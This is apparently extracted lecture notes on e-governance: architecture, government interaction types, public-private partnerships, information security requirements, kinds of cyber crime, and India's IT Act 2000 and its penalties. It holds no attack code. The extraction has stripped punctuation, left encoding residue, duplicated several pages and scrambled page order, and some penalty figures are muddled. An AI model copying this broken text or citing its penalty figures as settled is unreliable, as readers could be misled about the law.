five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
